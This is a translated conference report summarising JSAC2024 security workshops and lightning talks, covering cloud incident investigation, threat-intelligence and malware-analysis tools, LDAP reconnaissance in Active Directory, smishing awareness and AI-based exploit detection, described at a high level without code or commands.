We continue to introduce the talks at JSAC2024. This third issue covers workshops and lightning talks.

Workshop

Introduction to Investigation of Unauthorised Access to Cloud

Speakers: Hayate Hazuru and Takahiro Yamamoto (ITOCHU Cyber & Intelligence Inc.), Norihide Saito (Flatt Security Inc.), Daisuke Miyashita (Sterra Security Co.,Ltd.)

Hayate, Takahiro, Norihide, and Daisuke explained how the cloud works and the attack methods targeting cloud in their workshop, followed by a log investigation demonstration based on a real security incident. First, they explained the resource manipulation and authentication techniques as well as the processes in the context of attack and defence techniques of the cloud. By calling APIs, resources in the cloud can be managed in various interfaces, such as GUI and CLI. They also touched on the authentication and authorisation functionality through IAM (IdP) in terms of token granting and the operation authorisation using AWS as an example. Next, attack techniques on the cloud were described with many case studies. Typical examples included consent phishing, urging users to authenticate a malicious client, and device code phishing, which exploits device authorisation to generate tokens for victims, as well as software supply chain breaches, publishing fake libraries or tampering with legitimate libraries. Protecting credentials such as API keys and tokens is crucial to the security of the cloud, and any resource is at risk if its credentials are stolen. Based on the above explanation, hands-on training on responding to an incident on an e-commerce site built in the cloud was provided, using logs from Amazon GuardDuty, Falco, CloudTrail and other sources. Some details were given on how to investigate a number of attacks, from initial intrusion to privilege escalation, persistence and data exfiltration. Finally, they stressed the importance of understanding each cloud's specifications and securing a container footprint. When using managed services such as Fargate or applying autoscaling configurations, users need to be check whether the log files are accessible and make sure that they have not been deleted.

Infrastructure Tracking With Mihari

Speaker: Manabu Niseki

Manabu conducted a workshop on Mihari, a monitoring tool that works with a variety of services to collect and analyse threat intelligence and process data from multiple sources. Mihari connects with several services such as Shodan, Censys and VirusTotal to create rules for searches and store them in a database. It also automatically outputs search results in the database and notifies users via webhooks, etc. An yml file was presented that helps to search for services with specific titles, ports, etc., containing HTML hash values and SSL certificate serial numbers which are the rules for finding landing pages for MoqHao, the Android malware. He also touched on threat detection and automation of network scans linked to the scanning tool Nuclei. The workshop environment can be set up using Docker and Visual Studio Code. The detailed description of Mihari and the exercises are available on GitHub below.
https://ninoseki.github.io/jsac_mihari_workshop/setup/

Investigation Techniques and Practice on External Attack Surface

Speakers: Kenzo Masamoto, Takeya Yamazaki, Yutaka Sejiyama, Takeshi Teshigawara (Macnica, Inc.)

Kenzo, Takeya, Yutaka and Takeshi presented a workshop on EASM (External Attack Surface Management), an initiative to understand and manage Internet-facing assets (e.g. network appliances and servers) that recently trigger cybercrime, such as ransomware infection. They began the presentation with a brief description of ASM and the background on the need for EASM, explaining the percentage of incidents that have originated from Internet-facing assets in recent years. In large enterprises, the speakers emphasised that it is important to identify the assets and manage patches and that incidents are often triggered by their overseas offices. They then gave a hands-on training on how to assess the risk of these assets after the identification, how to conduct an efficient risk analysis and how to determine if there are any critical vulnerabilities. They mentioned the importance of identifying the assets, assigning the asset manager and smooth communication with them, as well as creating an automated mechanism to prevent investigation errors. In summary, they highlighted that the audience should be aware of their vulnerable assets held not only in Japan but also in overseas branches, implement risk countermeasures correctly and use these to improve their own security and governance.

Lightning Talk

Where is “that” anti-debug? Introduction of AntiDebugSeeker

Speaker: Takahiro Takeda Slides (English)

Takahiro introduced AntiDebugSeeker, a tool that automatically identifies anti-debugging features in malware. AntiDebugSeeker not only extracts Windows APIs that may be used by malware, but also extracts other anti-debugging functions that cannot be identified by Windows API calls alone by using keywords as triggers. The detection method and the operation of the tool were explained with demonstrations. It showed how to add detection words, allowing flexible keyword search. The tool also displays detection results in a highlighted list, jumps to specific functions from the search results and displays function descriptions. This IDA tool is available at the URL below, and a Ghidra version is now under development.
https://github.com/LAC-Japan/IDA_Plugin_AntiDebugSeeker

Z9 Malicious PowerShell Script Analyzer

Speakers: Maya Hyakuzuka, Issei Takenaka Slides (English)

Maya and Issei made a presentation on z9, a tool to determine whether a target PowerShell script is potentially malware. There are many challenges in analysing PowerShell malware, as it runs fileless and is obfuscated in multiple ways. The z9 feature runs the target PowerShell script in a sandbox and collects its Windows event logs. It identifies malware based on the following elements:

• Invoke Expression command
• Blacklist
• Scoring by logistic regression
• Percentage of symbols
• Randomised strings
• URLs of IoC

The detection mechanism was clarified in their talk, along with the result that the tool was able to detect malware correctly in more than 70% of the cases. The tool is available at the following URL:
https://z9.shino.club/ https://github.com/Sh1n0g1/z9

Bypass of anti-fraud filters with modern proxyware infrastructure: What we saw in data and how we setup the honeypot

Speaker: ChenYu "GD" Dai

GD discussed criminal activity using home proxies. The content was only available to the audience onsite.

Utilizing the Attack and Defense Perspectives of LDAP in Active Directory

Speaker: Michio Uyama

Michio described LDAP, which is used as part of attacks on Active Directory, and how it is queried, verified, and used in threat hunting. He emphasised that Active Directory is an important target in APT, where the act of reconnaissance leads to a breach and that attackers use LDAP for these activities in the early stages of attacks against Active Directory. As LDAP is used in Kerberoasting attack to retrieve service account information, he provided examples of characteristic LDAP queries used for reconnaissance activities and explained what defenders should focus on. He would continue to research queries to look out for in threat hunting and the effectiveness of decoys.

Smishing Monitor Release Backstory

Speaker: Yutaka Tsuge

Yutaka described Smishing Monitor, a website to raise general users’ awareness on SMS fraud. There are two types of SMS filtering in Japan: firewalls and client applications. The former does not allow users to check SMSs, so the impact of false positives is high, while the latter allows users to check SMSs, so the impact is low. Next, the features and trends of smishing were mentioned. The attackers often use Android malware MoqHao (XLOADER) and KeepSpy and send SMSs which impersonate courier services during the day and telecom carriers and financial institutions at night. Attacker tactics have recently become more sophisticated, with SMS associated with events such as Christmas, and the text appearing natural. He mentioned that the smishing monitor service, “Scam SMS Monitor” was released during Cyber Security Month in Japan.
https://smon.tobila.com(Japanese)

Knowledge and Problems from the Automatic Exploit Decision Implementation in Public Repositories

Speaker: Masaya Akagi

Masaya discussed a method for early and accurate detection of exploit codes from GitHub using AI. As a background on this research, he mentioned that both the number of CVE-IDs issued and the number of exploit codes are on the rise, and that exploit codes on GitHub are published about a month earlier than in other major archives. He stated that by automatically cloning repositories published to GitHub and adapting a method using LightGBM, it was possible to automatically detect whether the code was an exploit code with an accuracy of more than 90%. In the future, he stated that he would like to implement dynamic analysis of script files and binary files, and to enhance AI judgement through re-learning of false positives.

In Closing

On 7 March 2024, “After JSAC 2024” was held, and the Best Speaker Award and the Special Recognition Award were presented. The best speaker was selected based on feedback from participants. The awardees for Special Recognition Award were selected by the CFP Review Board. The awardees are as follows:

Best Speaker Award
Title: Introduction to Investigation of Unauthorised Access to Cloud Speakers: Hayate Hazuru and Takahiro Yamamoto (ITOCHU Cyber & Intelligence Inc.), Norihide Saito (Flatt Security Inc.), Daisuke Miyashita (Sterra Security Co.,Ltd.)

Special Recognition Award
Title: Dark Side of VSCode ~ How Attacker Abuse VSCode as RAT ~ Speakers: Shuhei Sasada and Hayate Hazuru (ITOCHU Cyber & Intelligence Inc.)

We would like to thank all participants of JSAC2024 and everyone who read this report.

Kyosuke Nakamura (Translated by Masa Toyama)